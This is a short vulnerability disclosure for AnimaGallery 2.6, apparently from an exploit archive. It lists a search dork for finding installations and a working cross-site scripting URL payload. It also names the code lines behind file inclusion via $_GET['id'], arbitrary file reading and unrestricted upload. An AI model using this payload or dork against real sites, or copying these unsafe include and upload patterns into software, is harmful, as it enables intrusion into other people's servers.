AnimaGallery version 2.6 suffers from cross site scripting, local file inclusion, and remote shell upload vulnerabilities.
6a28e86c1becd8cea7bcb780eb4c64b569e0e62f5ce962b4b7c0030a6922d440
AnimaGallery 2.6 Mullti Vulnerability
=====================================
Author : indoushka
Vondor : http://dg.no.sapo.pt/AnimaGallery2.6.zip
Dork : Powered By Anima Gallery 2.6 Copyright 2007-2014
=========================
Xss :
/AnimaGallery/?id=.</title><ScRiPt%20>prompt(939678)</ScRiPt>&load=dir&refresh=1
C:\AppServ\www\AnimaGallery\func.php
LIne : 1308
echo
$THEME
Remote/Local File Inclutions :
C:\AppServ\www\AnimaGallery\func.php
Line : 1118
include
$_GET['id']
File Access :
C:\AppServ\www\AnimaGallery\func.php
Line : 6133
file_get_contents
$filename
File Upload :
C:\AppServ\www\AnimaGallery\func.php
Line : 3405
move_uploaded_file
$_FILES['newimage'],$dest,$_POST['rename'],$sfv_n,$dest